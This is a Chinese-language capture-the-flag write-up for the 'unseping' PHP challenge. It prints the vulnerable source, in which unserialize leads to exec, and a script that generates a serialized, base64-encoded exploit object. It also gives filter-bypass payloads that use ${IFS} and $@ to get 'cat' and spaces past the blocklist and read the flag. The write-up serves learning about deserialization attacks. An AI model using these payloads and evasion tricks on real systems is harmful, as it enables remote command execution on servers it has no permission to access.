nnnd，这道题谁标的难度1！参考文章：江苏工匠杯-unseping&序列化，正则绕过(全网最简单的wp)_江苏工匠杯unseping-CSDN博客

这是这道题的源码，一看exec和unserialize就是反序列化和命令执行，还有个正则应该还要绕过

<?php
highlight_file(__FILE__);class ease{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}function __destruct(){if (in_array($this->method, array("ping"))) {call_user_func_array(array($this, $this->method), $this->args);}} function ping($ip){exec($ip, $result);var_dump($result);}function waf($str){if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {return $str;} else {echo "don't hack";}}function __wakeup(){foreach($this->args as $k => $v) {$this->args[$k] = $this->waf($v);}}   
}$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>

简单讲一下call_user_func_array调用回调函数，大概就是这样，网上找的例子，本题中我猜测因为是在魔术方法里面，所以第一个参数array()里面类用伪变量$this替代了

（1）普通使用：

           function a($b, $c) {  

                echo $b; 

                echo $c; 

           } 

          call_user_func_array('a', array("111", "222")); 

          //输出 111 222

（2）调用类内部的方法：

         Class ClassA { 

                 function bc($b, $c) { 

                  $bc = $b + $c; 

                  echo $bc; 

                 } 

            } 

          call_user_func_array(array('ClassA','bc'), array("111", "222")); 

          //输出  333 

这个正则表达式解释如下

• /: 正则表达式的开始和结束的分隔符。
• (: 开始一个捕获组，用于将匹配的结果保存在结果数组中。
• \|: 匹配一个垂直线字符"|"
• |: 逻辑或操作符，用于匹配多个模式之一。
• &: 匹配一个和字符"&"
• ;: 匹配一个分号字符";"
• : 匹配一个空格字符
• \/: 匹配一个斜杠字符"/"
• cat: 匹配字符串"cat"
• flag: 匹配字符串"flag"
• tac: 匹配字符串"tac"
• php: 匹配字符串"php"
• ls: 匹配字符串"ls"
• ): 结束捕获组。
• /: 正则表达式的结束符。

综上所述，该正则表达式将匹配字符串中的垂直线字符"|"、和字符"&"、分号字符";"、空格字符、斜杠字符"/"，以及字符串"cat"、"flag"、"tac"、"php"、"ls"。

空格被过滤了，但是我们写命令的时候还需要空格，怎么办？

我只知道一个IFS空格，使用的时候写成${IFS}起到空格的作用。

上网查@是一个特殊变量，使用$@的形式起到空变量的作用，放在字符串中间绕过字符串过滤又不会对原字符串产生影响

魔术方法：

__construct() //创建对象时触发

__wakeup() //执行unserialize()时，先会调用这个函数

okk，到这里差不多读懂代码了，代码流程：将我们的base64编码并且序列化的数据经过post请求发送到PHP文件处理，代码首先接受数据然后base64解码反序列化，又因为wakeup这个魔术方法在反序列化前会被优先调用，所以执行wakeup方法：遍历关联数组args，将每个键对应的值用waf方法进行正则匹配，如果匹配通过后返回原字符串，否则打印hack，由此可以看出args存放的是系统命令这些。然后执行反序列化，对象被重新创建后无调用又被销毁，触发destruct魔术方法:in_array函数内容确定了method值为ping，然后call_user_func_array调用回调函数调用ping函数，将args数组内容作为ping函数的参数，然后exec执行系统命令，结果存到result，var_dump打印类型和值

上面的流程已经说的很详细了，我们先来试试水看看能不能执行命令

别忘了args是数组形式哦！

<?php
class ease
{private $method;private $args;function __construct($method, $args){$this->method = $method;$this->args = $args;}
}
$object = new ease('ping',array('id'));
$ser = serialize($object);
$ser = base64_encode($ser);
echo $ser;
?>

成功执行id命令

接下来看看当前目录下的文件，args传入参数变为array('l$@s')，正则匹配会匹配整个l$@s，但是$@是空变量，最后解析出来还是ls

flag文件是数组的第一个元素

find 查看当前及子目录下的所有文件，我们可以使用cat 直接查看当前目录下的文件内容，不需要再编码来回转了

payload：

array('c$@at${IFS}`find`')，使用反引号是因为会优先执行反引号里面的命令

成功读出flag！不懂多看一下我写的流程思路就明白了